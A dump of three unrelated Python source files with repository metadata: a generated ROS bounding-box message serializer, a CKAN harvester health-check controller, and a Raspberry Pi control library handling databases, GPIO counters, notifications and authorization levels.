self.bounding_boxes = []
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
_x = self.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self
buff.write(_get_struct_3I().pack(_x.image_header.seq, _x.image_header.stamp.secs, _x.image_header.stamp.nsecs))
_x = self.image_header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
length = len(self.bounding_boxes)
buff.write(_struct_I.pack(length))
for val1 in self.bounding_boxes:
_x = val1.Class
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = val1
buff.write(_get_struct_d4q().pack(_x.probability, _x.xmin, _x.ymin, _x.xmax, _x.ymax))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
if python3:
codecs.lookup_error("rosmsg").msg_type = self._type
try:
if self.header is None:
self.header = std_msgs.msg.Header()
if self.image_header is None:
self.image_header = std_msgs.msg.Header()
if self.bounding_boxes is None:
self.bounding_boxes = None
end = 0
_x = self
start = end
end += 12
(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.header.frame_id = str[start:end]
_x = self
start = end
end += 12
(_x.image_header.seq, _x.image_header.stamp.secs, _x.image_header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.image_header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.image_header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.bounding_boxes = []
for i in range(0, length):
val1 = yolov3_pytorch_ros.msg.BoundingBox()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.Class = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.Class = str[start:end]
_x = val1
start = end
end += 40
(_x.probability, _x.xmin, _x.ymin, _x.xmax, _x.ymax,) = _get_struct_d4q().unpack(str[start:end])
self.bounding_boxes.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
_x = self.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self
buff.write(_get_struct_3I().pack(_x.image_header.seq, _x.image_header.stamp.secs, _x.image_header.stamp.nsecs))
_x = self.image_header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
length = len(self.bounding_boxes)
buff.write(_struct_I.pack(length))
for val1 in self.bounding_boxes:
_x = val1.Class
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = val1
buff.write(_get_struct_d4q().pack(_x.probability, _x.xmin, _x.ymin, _x.xmax, _x.ymax))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
if python3:
codecs.lookup_error("rosmsg").msg_type = self._type
try:
if self.header is None:
self.header = std_msgs.msg.Header()
if self.image_header is None:
self.image_header = std_msgs.msg.Header()
if self.bounding_boxes is None:
self.bounding_boxes = None
end = 0
_x = self
start = end
end += 12
(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.header.frame_id = str[start:end]
_x = self
start = end
end += 12
(_x.image_header.seq, _x.image_header.stamp.secs, _x.image_header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.image_header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.image_header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.bounding_boxes = []
for i in range(0, length):
val1 = yolov3_pytorch_ros.msg.BoundingBox()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.Class = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.Class = str[start:end]
_x = val1
start = end
end += 40
(_x.probability, _x.xmin, _x.ymin, _x.xmax, _x.ymax,) = _get_struct_d4q().unpack(str[start:end])
self.bounding_boxes.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_3I = None
def _get_struct_3I():
global _struct_3I
if _struct_3I is None:
_struct_3I = struct.Struct("<3I")
return _struct_3I
_struct_d4q = None
def _get_struct_d4q():
global _struct_d4q
if _struct_d4q is None:
_struct_d4q = struct.Struct("<d4q")
return _struct_d4q
| 39.502825 | 145 | 0.660898 |
4a1f3deda29119f80674e2c22b3ffbd0802e4ddf | 2,587 | py | Python | ckanext/ckanext-apicatalog_routes/ckanext/apicatalog_routes/health.py | eetumans/api-catalog | a32a52c48425be8b71d83c60c93b26db7787e632 | [
"MIT"
] | null | null | null | ckanext/ckanext-apicatalog_routes/ckanext/apicatalog_routes/health.py | eetumans/api-catalog | a32a52c48425be8b71d83c60c93b26db7787e632 | [
"MIT"
] | null | null | null | ckanext/ckanext-apicatalog_routes/ckanext/apicatalog_routes/health.py | eetumans/api-catalog | a32a52c48425be8b71d83c60c93b26db7787e632 | [
"MIT"
] | null | null | null | import ckan.lib.base as base
import pylons.config as config
import urllib2
import logging
import ckan.logic as logic
import datetime
from pprint import pformat
import ckan.model as model
get_action = logic.get_action
log = logging.getLogger(__name__)
SITE_URL_FAILURE_LOGMESSAGE = "Site URL '%s' failed to respond during health check."
HARVEST_FAILURE_LOGMESSAGE = "Harvester '%s' has errors:\n%s"
HARVEST_TIMEOUT_LOGMESSAGE = "Harvester '%s' is probably stuck:\n%s"
FAILURE_MESSAGE = "An error has occurred, check the server log for details"
SUCCESS_MESSAGE = "OK"
HARVEST_JOB_TIMESTAMP_FORMAT = "%Y-%m-%d %H:%M:%S.%f"
HARVEST_JOB_TIMEOUT = datetime.timedelta(days=1)
def check_url(url):
try:
response = urllib2.urlopen(url, timeout=30)
return response.getcode() == 200
except urllib2.URLError:
return False
class HealthController(base.BaseController):
check_site_urls = ['/']
def check(self):
result = True
site_url = config.get('ckan.site_url')
for url in self.check_site_urls:
if not check_url("%s/%s" % (site_url, url)):
log.warn(SITE_URL_FAILURE_LOGMESSAGE % url)
result = False
harvest_source_list = get_action('harvest_source_list')
data_dict = {'return_last_job_status': True}
context = {'model': model,
'ignore_auth': True}
for harvest_source in harvest_source_list(context, data_dict):
last_job_status = harvest_source.get('last_job_status')
if last_job_status is not None:
num_errors = last_job_status.get('stats', {}) .get('errored', 0)
if num_errors > 0:
log.warn(HARVEST_FAILURE_LOGMESSAGE % (
harvest_source.get('title', ''),
pformat(harvest_source)))
result = False
elif not last_job_status.get('finished'):
harvest_job_created = last_job_status.get('created')
created = datetime.datetime.strptime(harvest_job_created, HARVEST_JOB_TIMESTAMP_FORMAT)
now = datetime.datetime.now()
if now - created > HARVEST_JOB_TIMEOUT:
log.warn(HARVEST_TIMEOUT_LOGMESSAGE % (
harvest_source.get('title', ''),
pformat(harvest_source)))
result = False
if result:
base.abort(200, SUCCESS_MESSAGE)
else:
base.abort(503, FAILURE_MESSAGE)
| 36.957143 | 107 | 0.614612 |
4a1f3e323abde038ea308713e75edf7e6f16bc5d | 32,126 | py | Python | cupid/pilib.py | iinnovations/iicontrollibs | 94af26a61405f1ad928d36e36602ebb859a2e44f | [
"Apache-2.0"
] | 11 | 2015-06-22T21:38:15.000Z | 2021-03-10T11:24:21.000Z | cupid/pilib.py | iinnovations/iicontrollibs | 94af26a61405f1ad928d36e36602ebb859a2e44f | [
"Apache-2.0"
] | null | null | null | cupid/pilib.py | iinnovations/iicontrollibs | 94af26a61405f1ad928d36e36602ebb859a2e44f | [
"Apache-2.0"
] | 12 | 2015-03-05T00:19:40.000Z | 2020-12-18T15:21:44.000Z | #!/usr/bin/python3
__author__ = "Colin Reese"
__copyright__ = "Copyright 2016, Interface Innovations"
__credits__ = ["Colin Reese"]
__license__ = "Apache 2.0"
__version__ = "1.0"
__maintainer__ = "Colin Reese"
__email__ = "[email protected]"
__status__ = "Development"
import os
import sys
import inspect
top_folder = \
os.path.split(os.path.realpath(os.path.abspath(os.path.split(inspect.getfile(inspect.currentframe()))[0])))[0]
if top_folder not in sys.path:
sys.path.insert(0, top_folder)
# This library is for use by all other pi
# functions
"""
Global declarations of useful variables. We are transitioning to bunches of definitions, which make
things a bit easier to move around, and mainly simpler to iteratively assign without having to use hacks for
variable names
Question: Which things are hard-coded here? Why would everything just not be in the database?
Answer: Only things which may need to be changed at run-time by the user/admin are in the database. \
Log locations, for example, don't have a practical reason to be assigned in this instance.
Log levels, on the other hand, may need to be regularly changed from the web UI
We have hybrids (as above) where we set a default level here and then set attempt to get updated values
from the database. We try to do this in as error-tolerant a fashion as we can.
"""
from iiutilities.utility import Bunch
from iiutilities import dblib
dirs = Bunch()
dirs.baselib = '/usr/lib/iicontrollibs/'
dirs.web = '/var/www/'
dirs.database = dirs.web + 'data/'
dirs.onewire = '/var/1wire/'
dirs.output = dirs.web + 'data/'
dirs.log = '/var/log/cupid/'
dirs.archive = dirs.database + 'archive/'
dirs.safe = '/var/wwwsafe/'
dirs.dbs = Bunch()
dirs.dbs.control = dirs.database + 'control.db'
dirs.dbs.log = dirs.database + 'logdata.db'
dirs.dbs.session = dirs.database + 'authlog.db'
dirs.dbs.recipe = dirs.database + 'recipedata.db'
dirs.dbs.system = dirs.database + 'system.db'
dirs.dbs.motes = dirs.database + 'motes.db'
dirs.dbs.info = dirs.database + 'deviceinfo.db'
dirs.dbs.auths = dirs.database + 'authslog.db'
dirs.dbs.data_agent = '/var/wwwsafe/dataagent.db'
dirs.dbs.notifications = dirs.database + 'notifications.db'
dirs.dbs.safe = dirs.safe + 'safedata.db'
dirs.dbs.users = dirs.safe + 'users.db'
dirs.logs = Bunch()
dirs.logs.network = dirs.log + 'network.log'
dirs.logs.io = dirs.log + 'io.log'
dirs.logs.remote = dirs.log + 'remotes.log'
dirs.logs.system = dirs.log + 'systemstatus.log'
dirs.logs.control = dirs.log + 'control.log'
dirs.logs.daemon = dirs.log + 'daemon.log'
dirs.logs.actions = dirs.log + 'actions.log'
dirs.logs.serial = dirs.log + 'serial.log'
dirs.logs.notifications = dirs.log + 'notifications.log'
dirs.logs.daemonproc = dirs.log + 'daemonproc.log'
dirs.logs.error = dirs.log + 'error.log'
dirs.logs.db = dirs.log + 'db.log'
dbs = Bunch()
class cupidDatabase(dblib.sqliteDatabase):
def __init__(self, *args, **kwargs):
settings = {
'log_errors':True,
'log_path':dirs.logs.db,
'quiet':True
}
settings.update(kwargs)
# This calls the parent init
super(cupidDatabase, self).__init__(*args, **settings)
for db_name in dirs.dbs.__dict__:
setattr(dbs, db_name, cupidDatabase(getattr(dirs.dbs, db_name)))
salt = 'a bunch of random characters and symbols for security'
maxlogsize = 1024 # kB
numlogs = 5
loglevels = Bunch()
# These just really serve as defaults. We pick them up later from the db.
loglevels.network = 5
loglevels.io = 3
loglevels.system = 4
loglevels.control = 4
loglevels.daemon = 3
loglevels.serial = 2
loglevels.actions = 2
loglevels.notifications = 5
daemonprocs = ['cupid/periodicupdateio.py', 'cupid/picontrol.py', 'cupid/systemstatus.py', 'cupid/sessioncontrol.py', 'mote/serialhandler.py']
daemonprocnames = ['updateio', 'picontrol', 'systemstatus', 'sessioncontrol', 'serialhandler']
schema = Bunch()
schema.channel = dblib.sqliteTableSchema([
# {'name': 'channelindex','type':'integer','primary':True},
{'name': 'name', 'unique': True},
{'name': 'index', 'type': 'integer', 'primary': True},
{'name': 'type', 'default': 'local'},
{'name': 'id', 'unique': True},
{'name': 'pv_input', 'default': 'none'},
{'name': 'sv_input', 'default': 'none'},
{'name': 'output_input', 'default': 'none'},
{'name': 'enabled_input', 'default': 'none'},
{'name': 'enabled', 'type': 'boolean', 'default': 0},
{'name': 'outputs_enabled', 'type': 'boolean', 'default': 0},
{'name': 'control_update_time'},
{'name': 'control_algorithm', 'default': 'on/off 1'},
{'name': 'control_recipe', 'default': 'none'},
{'name': 'recipe_stage', 'type': 'integer', 'default': 0},
{'name': 'recipe_start_time'},
{'name': 'recipe_stage_start_time'},
{'name': 'setpoint_value', 'type': 'real'},
{'name': 'process_value', 'type': 'real'},
{'name': 'process_value_time'},
{'name': 'positive_output'},
{'name': 'negative_output'},
{'name': 'action', 'type': 'real', 'default': 0},
{'name': 'mode', 'default': 'manual'},
{'name': 'status_message'},
{'name': 'log_options', 'default': 'mode:timespan,size:8,unit:hours'},
{'name': 'data'},
{'name': 'dataclasses'},
{'name': 'pending'}
])
schema.input = dblib.sqliteTableSchema([
{'name': 'id', 'primary':True},
{'name': 'interface'},
{'name': 'type'},
{'name': 'address'},
{'name': 'name'},
{'name': 'value', 'type': 'real'},
{'name': 'unit'},
{'name': 'polltime'},
{'name': 'pollfreq'},
{'name': 'ontime'},
{'name': 'offtime'},
{'name': 'log_options', 'default': 'mode:timespan,size:8,unit:hours'}
])
schema.channel_datalog = dblib.sqliteTableSchema([
{'name':'time','primary':True},
{'name':'process_value','type':'real'},
{'name':'setpoint_value','type':'real'},
{'name':'action','type':'real'},
{'name':'algorithm'},
{'name':'enabled','type':'real'},
{'name':'status_msg'}
])
schema.standard_datalog = dblib.sqliteTableSchema([
{'name':'time', 'primary':True},
{'name':'value', 'type':'real'}
])
schema.data_agent = dblib.sqliteTableSchema([
{'name':'data_id','primary':True},
{'name':'data_name'},
{'name':'send_freq', 'default':'0'}, # Seconds. Zero means whenever there is new data, send it
{'name':'last_send'},
{'name':'last_send_timestamp'},
{'name':'total_sends', 'type':'integer'},
{'name':'last_send_size','type':'integer'},
{'name':'cume_send_size','type':'integer'}
])
schema.data_items = dblib.sqliteTableSchema([
{'name':'valuename','primary':True},
{'name':'value'}
])
schema.mote = dblib.sqliteTableSchema([
{'name':'time'},
{'name':'message','primary':True},
{'name':'value'}
])
schema.users = dblib.sqliteTableSchema([
{'name':'id','type':'integer', 'primary':True},
{'name':'name'},
{'name':'password'},
{'name':'email'},
{'name':'temp'},
{'name':'authlevel','type':'integer','default':0}
])
"""
Utility Functions
# This function is what keeps things sane for our database handling.
# We moved all references to database paths out of html entirely, and we
# pass handles. This does several things:
# 1. Centralizes all path references. No longer do we need to name paths in js and also in python
# Now all references live on the server, where they belong. This way the the html/js is totally agnostic to
# where things live.
# 2. Removes any path information from the html. Security issue: all html/js is visible to world.
# 3. Eliminates the possibility of queries on databases that are not properly locked down. There are permissions in
# place to require authorization for anything but read-only operation, and often requirements in these cases,
# but even better, we do aliasing server-side so that ONLY those databases that we alias (and under which conditions
# we specify) are even readable. It also puts in place a clean way of selectively allowing access via user auths/keywords.
"""
# This is a subclass to set default pilib logging options.
def updateiicontrollibs(stash=False):
from iiutilities.gitupdatelib import stashrepo, pullrepo, updaterepoversion
repodirectory = dirs.baselib
originname = 'master'
if stash:
stashrepo(repodirectory, originname)
pullrepo(repodirectory, originname)
updaterepoversion(repodirectory)
print('update complete')
def updatecupidweblib(stash=False):
from iiutilities.gitupdatelib import stashrepo, pullrepo, updaterepoversion
repodirectory = dirs.web
originname = 'master'
if stash:
stashrepo(repodirectory,originname)
pullrepo(repodirectory, originname)
updaterepoversion(repodirectory)
print('update complete')
def table_name_to_type(tablename):
type = 'unknown'
subtype = 'unknown'
id = 'unknown'
try:
splits = tablename.split('_')
for test_type in ['input', 'channel']:
if splits[0] == test_type:
type = test_type
if splits[1].lower().find('gpio') >= 0:
subtype = 'gpio'
elif splits[1].lower().find('mote') >=0:
subtype = 'mote'
elif splits[1].lower().find('1wire') >=0:
subtype = '1wire'
id = '_'.join(splits[1:-1])
except:
pass
return {'type':type, 'subtype':subtype, 'id':id}
def dbnametopath(friendlyname):
friendlynames = ['controldb', 'logdatadb', 'infodb', 'systemdb', 'authdb', 'safedatadb', 'usersdb', 'motesdb', 'notificationsdb']
paths = [dirs.dbs.control, dirs.dbs.log, dirs.dbs.info, dirs.dbs.system, dirs.dbs.auths, dirs.dbs.safe, dirs.dbs.users, dirs.dbs.motes, dirs.dbs.notifications]
path = None
if friendlyname in friendlynames:
path = paths[friendlynames.index(friendlyname)]
return path
def processnotification(notification):
from iiutilities import datalib
from iiutilities import utility
from iiutilities.netfun import pingstatus
senttime = datalib.gettimestring()
result = {'status':1, 'senttime':senttime}
if notification['type'] == 'email':
# Check to make sure we're online.
pingresult = pingstatus()
if not pingresult['status']:
utility.log(dirs.logs.notifications, 'WAN access is ok, so processing notification')
options = datalib.parseoptions(notification['options'])
message = notification['message']
if 'subject' in options:
subject = options['subject']
else:
subject = 'CuPID Notification Email'
message += '\r\n\r\n'
message += 'Message queued:\t ' + notification['queuedtime'] + '\r\n'
message += 'Message sent:\t ' + senttime + '\r\n'
if 'email' in options:
try:
email = options['email']
actionmail = utility.gmail(message=message, subject=subject, recipient=email)
actionmail.send()
except:
pass
else:
result['status'] = 0
else:
utility.log(dirs.logs.notifications, 'WAN access does not appear to be ok. Status is: ' + str(pingresult['status']))
return result
def process_notifications_queue():
from iiutilities import dblib
from iiutilities.utility import log
notifications_db = cupidDatabase(dirs.dbs.notifications)
queuednotifications = notifications_db.read_table('queued')
for notification in queuednotifications:
if loglevels.notifications >= 5:
log(dirs.logs.notifications, 'Processing notification of type' + notification['type'] + '. Message: ' + notification['message'] + '. Options: ' + notification['options'])
else:
log(dirs.logs.notifications, 'Processing notification of type' + notification['type'])
result = processnotification(notification)
if result['status'] == 0:
log(dirs.logs.notifications, 'Notification appears to have been successful. Copying message to sent.')
sententry = notification.copy()
sententry['senttime'] = result['senttime']
dblib.insertstringdicttablelist(dirs.dbs.notifications, 'sent', [sententry], droptable=False)
log(dirs.logs.notifications, 'Removing entry from queued messages.')
# match by time and message
conditionnames = ['queuedtime', 'message']
conditionvalues = [sententry['queuedtime'], sententry['message']]
notifications_db.delete('queued', {'conditionnames':conditionnames, 'conditionvalues':conditionvalues})
# delquery = dblib.makedeletesinglevaluequery('queuednotifications', {'conditionnames':conditionnames, 'conditionvalues':conditionvalues})
# dblib.sqlitequery(dirs.dbs.notifications, delquery)
else:
log(dirs.logs.notifications, 'Notification appears to have failed. Status: ' + str(result['status']))
def run_cupid_data_agent():
from iiutilities import dblib
# Get api info
safe_db = cupidDatabase(dirs.dbs.safe)
api_info = safe_db.read_table('api')
if not api_info:
print('No API info found. Aborting. ')
return
"""
IO functions
"""
def getgpiostatus():
from subprocess import check_output
gpiolist=[]
alloutput = check_output(['gpio','readall']).decode('utf-8')
lines = alloutput.split('\n')[3:18]
for line in lines:
BCM1 = line[4:6].strip()
wpi1 = line[10:12].strip()
name1 = line[15:22].strip()
mode1 = line[25:30].strip()
val1 = line[32:34].strip()
phys1 = line[36:39].strip()
phys2 = line[42:44].strip()
val2 = line[46:48].strip()
mode2 = line[50:55].strip()
name2 = line[57:65].strip()
wpi2 = line[68:70].strip()
BCM2 = line[74:76].strip()
if BCM1 and BCM1 != '--':
# print(BCM1 + ':' + wpi1 + ':' + name1 + ':' + mode1 + ':' + val1 + ':' + phys1)
gpiolist.append({'BCM': BCM1, 'wpi': wpi1, 'name': name1, 'mode': mode1, 'value': val1, 'phys': phys1})
if BCM2 and BCM2 != '--':
# print(BCM2 + ':' + wpi2 + ':' + name2 + ':' + mode2 + ':' + val2 + ':' + phys2)
gpiolist.append({'BCM': BCM2, 'wpi': wpi2, 'name': name2, 'mode': mode2, 'value': val2, 'phys': phys2})
return gpiolist
class io_wrapper(object):
"""
This is going to be a general class of IO handler that has a identifying values to match against (to know when we
need to destroy and recreate it), and can handle functions in the background, such as pigpiod callbacks. This way
we can do more than atomic read/write operations. For GPIO, we can even set callbacks for value changes.
"""
def __init__(self, **kwargs):
# self.required_properties = ['type','options', 'pi']
self.required_properties = ['pi']
if not all(property in kwargs for property in self.required_properties):
print('You did not provide all required parameters: ' + str(self.required_properties))
self.settings = {}
self.settings.update(kwargs)
for key,value in self.settings.items():
setattr(self, key, value)
class pigpiod_gpio_counter(io_wrapper):
def __init__(self, **kwargs):
import copy
# inherit parent properties
super(pigpiod_gpio_counter, self).__init__(**kwargs)
import pigpio
self.settings = {'edge':'falling', 'pullupdown':None, 'debounce_ms':10, 'event_min_ms':10,
'watchdog_ms':1000, 'rate_period_ms':2000, 'debug':False, 'reset_ticks':30000,
'busy':False, 'init_counts':0}
self.settings.update(kwargs)
for key,value in self.settings.items():
setattr(self, key, value)
self.pi.set_mode(self.gpio, pigpio.INPUT)
self.pi.set_glitch_filter(self.gpio, self.settings['debounce_ms'] * 1000)
if self.pullupdown in ['up', 'pullup']:
self.pi.set_pull_up_down(self.gpio, pigpio.PUD_UP)
self._cb = self.pi.callback(self.gpio, pigpio.FALLING_EDGE, self._cbf)
self.pi.set_watchdog(self.gpio, self.watchdog_ms)
self.busy = False
self.ticks = copy.copy(self.settings['init_counts'])
self.last_event_count = 0
self.last_counts = copy.copy(self.settings['init_counts'])
if self.settings['init_counts']:
from datetime import datetime
self.last_counts_time = datetime.now()
else:
self.last_counts_time = None
self.rate = 0
def _cbf(self, gpio, level, tick):
if not self.busy:
self.busy = True
self.process_callback(gpio, level, tick)
def process_callback(self, gpio, level, tick):
# a tick event happened
import time
try:
if level == 0: # Falling edge
# time.sleep(0.001 * self.debounce_ms)
# value = self.pi.read(self.gpio)
# if value == 0:
# print('event length satisfied')
# if tick - self.last_event_count > self.debounce_ms * 1000:
self.ticks += 1
self.last_event_count = tick
# else:
# if self.debug:
# print('debounce')
# else:
# print('event not long enough ( we waited to see ).')
# pass
elif level == 2: # Watchdog timeout. We will calculate
pass
self.busy = False
except:
pass
# import traceback
# print("*** ****************************************************")
# print("*** ****************************************************")
# print("*** ****************************************************")
# print("*** ****************************************************")
# print("*** ****************************************************")
# print("*** ****************************************************")
# print("*** ****************************************************")
# print('PROCESSING ERROR')
# errorstring = traceback.format_exc()
# print(errorstring)
def get_value(self):
from datetime import datetime
now = datetime.now()
if self.last_counts_time:
seconds_delta = now - self.last_counts_time
seconds_passed = seconds_delta.seconds + float(seconds_delta.microseconds) / 1000000
self.rate = float(self.ticks - self.last_counts) / seconds_passed
if self.debug:
print('COUNTING RATE')
print(self.last_counts, self.ticks)
self.last_counts = self.ticks
self.last_counts_time = now
if self.ticks > self.reset_ticks:
if self.debug:
print('RESETTINGS (count is ' + str(self.ticks) + ')')
print('reset_ticks : ' + str(self.reset_ticks))
self.last_counts -= self.reset_ticks
self.ticks -= self.reset_ticks
# self.event_tick = 0 # reset event
return self.ticks
def get_rate(self):
return self.rate
class pigpiod_gpio_input(io_wrapper):
def __init__(self, **kwargs):
# inherit parent properties
super(pigpiod_gpio_input, self).__init__(**kwargs)
import pigpio
self.settings = {'pullupdown': None}
self.settings.update(kwargs)
for key, value in self.settings.items():
setattr(self, key, value)
self.pi.set_mode(self.gpio, pigpio.INPUT)
if self.pullupdown in ['up', 'pullup']:
self.pi.set_pull_up_down(self.gpio, pigpio.PUD_UP)
elif self.pullupdown in ['down','pulldown']:
self.pi.set_pull_up_down(self.gpio, pigpio.PUD_DOWN)
def get_value(self):
self.pi.read(self.gpio)
class pigpiod_gpio_output(io_wrapper):
def __init__(self, **kwargs):
# inherit parent properties
super(pigpiod_gpio_output, self).__init__(**kwargs)
import pigpio
self.settings = {}
self.settings.update(kwargs)
for key, value in self.settings.items():
setattr(self, key, value)
self.pi.set_mode(self.gpio, pigpio.OUTPUT)
def get_value(self):
self.pi.read(self.gpio)
def set_value(self, value):
self.pi.write(self.gpio, value)
"""
Auths helpers
"""
def check_action_auths(action, level):
action_auths_dict = {
'gettabledata':1,
'modifychannel':3,
'enablechannel':2,
'modifyaction':3,
'modifchannelalarm':3,
'enableaction':2,
'userdelete':5, 'useradd':5, 'usermodify':5,
'setvalue':4,
'setsystemflag':5,
'getmbtcpdata':2,
'getfiletext':5,
'dump':999
}
# Currently setup to blacklist only.
if action in action_auths_dict:
level_required = action_auths_dict[action]
else:
level_required = 0
try:
if int(level) >= level_required:
authorized = True
else:
authorized = False
except:
authorized = False
print('Action ' + action + ', ' + str(level) + ' provided, ' + str(level_required) + ' required : ' + str(authorized))
return authorized
"""
Authlog functions
"""
def checklivesessions(authdb, user, expiry):
import time
from iiutilities.datalib import timestringtoseconds
activesessions = 0
sessions = dbs.authdb.read_table('sessions')
for session in sessions:
sessioncreation = timestringtoseconds(session['timecreated'])
currenttime = time.mktime(time.localtime())
if currenttime - sessioncreation < expiry:
activesessions += 1
return activesessions
"""
WSGI helpers
"""
# This needs to be a subroutine, since it's very commonly used.
def app_check_keywords(d, required_keywords, output):
if not all(required_keywords in d):
output['message'] += 'Not all required keywords found. '
for keyword in required_keywords:
if keyword not in d:
output['message'] += '{} not found. '.format(keyword)
return False
else:
return True
def copy_log_to_archive(log_name, **kwargs):
settings = {
'archive_name': None,
'force_extension': True,
'extension':'.db',
'directory': dirs.archive
}
settings.update(kwargs)
from iiutilities.datalib import gettimestring
if not settings['archive_name']:
settings['archive_name'] = log_name + gettimestring() + '.db'
if settings['force_suffix'] and settings['archive_name'][-3:] != settings['suffix']:
settings['archive_name'] += '.db'
# Determine type by log name
from iiutilities.datalib import gettimestring
archive_db = dblib.sqliteDatabase(settings['directory'] + settings['archive_name'])
logs_db = dblib.sqliteDatabase(dirs.dbs.log)
existing_table = logs_db.read_table(log_name)
existing_schema = logs_db.get_schema(log_name)
archive_db.create_table('data', existing_schema, queue=True)
archive_db.insert('data', existing_table, queue=True)
archive_db.create_table('info', schema.data_items, queue=True)
archive_db.insert('info', {'valuename': 'created', 'value': gettimestring()}, queue=True)
archive_db.insert('info', {'valuename': 'name', 'value': log_name}, queue=True)
archive_db.execute_queue()
def rotate_all_logs(**kwargs):
# These defaults come from globals above
settings = {
'logs_to_keep':numlogs,
'max_log_size':maxlogsize,
'debug':False
}
settings.update(**kwargs)
from iiutilities.utility import rotate_log_by_size
for attr, value in dirs.logs.__dict__.items():
if settings['debug']:
print('Rotating {}'.format(attr))
rotate_log_by_size(value, settings['logs_to_keep'], settings['max_log_size'])
def app_copy_log_to_archive(d,output):
required_keywords = ['log_name', 'archived_log_name']
if not app_check_keywords(d,required_keywords,output):
return
copy_log_to_archive(d['log_name'], d['archived_log_name'])
# this is an auxiliary function that will carry out additional actions depending on
# table values. For example, setting a 'pending' value when modifying setpoints
def setsinglecontrolvalue(database, table, valuename, value, condition=None):
from iiutilities.datalib import gettimestring
from iiutilities import dblib
from iiutilities import utility
if table == 'channels':
utility.log(dirs.logs.control, "Table: " + table + " found in keywords", 4, loglevels.control)
if valuename in ['setpointvalue']:
utility.log(dirs.logs.control, "Set value: " + valuename + " found in keywords", 4, loglevels.control)
# Get the channel data
try:
channeldata = dblib.readonedbrow(dirs.dbs.control, 'channels', condition=condition)[0]
except:
utility.log(dirs.logs.control, "error retrieving channel with condition " + condition, 1, loglevels.control)
else:
utility.log(dirs.logs.control, "Channel retrieval went ok with " + condition, 1, loglevels.control)
"""
This all needs to go into the picontrol section
Set a pending value in modify channel, then picontrol processes pending setpoint
"""
if channeldata['type'] == 'remote' and channeldata['enabled']:
# Process setpointvalue send for remote here to make it as fast as possible.
# First we need to identify the node and channel by retrieving the interface
channelname = channeldata['name']
utility.log(dirs.logs.control, "Processing remote setpoint for channel " + channelname, 1, loglevels.io)
# Then go to the interfaces table to get the node and channel addresses
address = dblib.getsinglevalue(dirs.dbs.control, 'interfaces', 'address', condition ="name='" + channelname + "'")
utility.log(dirs.logs.control, "Channel has address " + address, 1, loglevels.io)
node = address.split(':')[0]
channel = address.split(':')[1]
# If it's local, we send the command to the controller directly
if int(node) == 1:
message = '~setsv;' + channel + ';' + str(value)
# If not, first insert the sendmsg command to send it to the remote node
else:
message = '~sendmsg;' + node + ';;~setsv;' + channel + ';' + str(value)
utility.log(dirs.logs.control, "Sending message: " + message, 1, loglevels.io)
# Then queue up the message for dispatch
dblib.sqliteinsertsingle(dirs.dbs.motes, 'queued', [gettimestring(), message])
# get existing pending entry
pendingvaluelist = []
